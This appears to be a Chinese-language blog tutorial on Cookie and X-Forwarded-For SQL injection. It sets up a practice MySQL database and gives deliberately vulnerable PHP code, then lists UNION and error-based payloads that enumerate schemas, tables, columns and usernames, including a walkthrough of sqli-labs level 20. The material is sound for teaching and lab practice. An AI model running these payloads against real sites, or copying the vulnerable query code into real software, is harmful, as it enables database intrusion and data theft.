Cookie注入和X-Forwarded-For注入
创始人
2024-02-07 09:57:24

💪💪Cookie注入和X-Forwarded-For注入

  • 一 .Cookie注入
    • 1.创建漏洞环境
    • 2.漏洞攻击
        • 2.1判断是否有注入
        • 2.2信息收集
        • 2.3注入获取数据库名
        • 2.4注入获取表名
        • 2.5注入获取列名
        • 2.6注入获取信息
    • 3.sql靶场实战
  • 二. X-Forwarded-For注入
    • 1.创建漏洞环境
    • 2.漏洞攻击
        • 2.1判断是否有注入
        • 2.2信息收集
    • 3.sql靶场实战
        • 2.3注入获取数据库名
        • 2.4注入获取表名
        • 2.5注入获取列名
        • 2.6注入获取信息


一 .Cookie注入

1.创建漏洞环境

💪💪第一步创建sql环境,直接再mysql下运行

create database loophole;
use loophole;
create table sql_test(id int auto_increment,primary key (id),username char(10),address char(20)
);
insert into sql_test values (1,'admin1','hubei'),(2,'mozhe','beijin'),(3,'admin','hubei'),(4,'yk','ensi');

⚠️⚠️第二步直接运行如下代码,其中连接数据库的用户名和密码必须换成自己的数据库的

 echo "连接错误" . mysqli_connect_error();
}
$result = mysqli_query($con, "select * from sql_test where id = " . $id);
if(!$result)
{printf(mysqli_error($con));exit();
}
$row = mysqli_fetch_array($result);
echo $row['username'] . "  " .$row['address'];

2.漏洞攻击

2.1判断是否有注入

在这里插入图片描述

如上id = 1 and 1=1显示正常
在这里插入图片描述
如上id = 1 and 1=2显示不正常,所以存在Cookie注入,并且1前后无标点符号

2.2信息收集

id=-1 union select 1,database(),user() :获取本网址的数据库

在这里插入图片描述

2.3注入获取数据库名

id = -1 union select 1,group_concat(schema_name),3 from information_schema.SCHEMATA; :获取所有数据库的名字,这条语句一般用于跨库注入

在这里插入图片描述

2.4注入获取表名

id = -1 union select 1, group_concat(table_name),3 from information_schema.TABLES where TABLE_SCHEMA='loophole'

在这里插入图片描述

2.5注入获取列名

id = -1 union select 1, group_concat(column_name),3 from information_schema.COLUMNS where TABLE_SCHEMA='loophole' and TABLE_NAME='sql_test';

在这里插入图片描述

2.6注入获取信息

id = -1 union select 1, group_concat(username),3 from loophole.sql_test

在这里插入图片描述

3.sql靶场实战

sqllibs第20关

    1. 先输入admin,admin,查看详细信息如下:

在这里插入图片描述
根据提示信息判断cookie注入

    1. 从源代码中我们可以看到 cookie 从 username 中获得值后,当再次刷新时,会从 cookie 中读取 username,然后进行查询。
      登录成功后,我们修改 cookie,再次刷新时,这时候 sql 语句就会被修改了。我们修改 cookie 为uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#可以看到报错了,我们得到了 mysql 的路径。
      其他的注入方法自行测试呦!

二. X-Forwarded-For注入

1.创建漏洞环境

直接运行如下代码,其中连接数据库的用户名和密码必须换成自己的数据库的

echo "连接错误" . mysqli_connect_error();
}
if(getenv('HTTP_CLIENT_IP')) //要求没有代理服务器
{$ip = getenv('HTTP_CLIENT_IP');
}elseif(getenv('HTTP_X_FORWARDED_FOR'))
{$ip = getenv('HTTP_X_FORWARDED_FOR');
}elseif(getenv('REMOTE_ADDR'))
{$ip = getenv('REMOTE_ADDR');
}else
{$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$result = mysqli_query($con, "select * from sql_test where id = " . $ip);
if(!$result)
{printf(mysqli_error($con));
}
$row = mysqli_fetch_array($result);
echo $row['username'] . " " . $row['address'];

2.漏洞攻击

X-Forwarded-For注入攻击的全过程必须要使用burpsuit,抓包之后使用burpsuit更改数据包,就是加上X-Forwarded-For: 1

2.1判断是否有注入

这个判断是否有注入攻击必须使用sqlmap,sqlmap -u 网址
请添加图片描述
请添加图片描述

2.2信息收集

请添加图片描述

其他跟union注入一模一样

3.sql靶场实战

请添加图片描述

2.3注入获取数据库名

-1 union select 1,database(),user() :获取本网址的数据库

在这里插入图片描述

-1 union select 1,group_concat(schema_name),3 from information_schema.SCHEMATA; :获取所有数据库的名字,这条语句一般用于跨库注入

2.4注入获取表名

-1 union select 1, group_concat(table_name),3 from information_schema.TABLES where TABLE_SCHEMA='loophole'

在这里插入图片描述

2.5注入获取列名

-1 union select 1, group_concat(column_name),3 from information_schema.COLUMNS where TABLE_SCHEMA='loophole' and TABLE_NAME='sql_test';
在这里插入图片描述

2.6注入获取信息

-1 union select 1, group_concat(username),3 from loophole.sql_test
在这里插入图片描述

相关内容

热门资讯

埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...
脚上的穴位图 脚面经络图对应的... 人体穴位作用图解大全更清晰直观的标注了各个人体穴位的作用,包括头部穴位图、胸部穴位图、背部穴位图、胳...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
世界上最漂亮的人 世界上最漂亮... 此前在某网上,选出了全球265万颜值姣好的女性。从这些数量庞大的女性群体中,人们投票选出了心目中最美...
埃菲尔铁塔在哪 中国仿建埃菲尔... 2019年4月26日,广西南宁市,街头惊现一座巨型山寨版埃菲尔铁塔,高约20米,白色塔身,造型逼真,...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
长白山自助游攻略 吉林长白山游... 昨天介绍了西坡的景点详细请看链接:一个人的旅行,据说能看到长白山天池全凭运气,您的运气如何?今日介绍...
应用未安装解决办法 平板应用未... ---IT小技术,每天Get一个小技能!一、前言描述苹果IPad2居然不能安装怎么办?与此IPad不...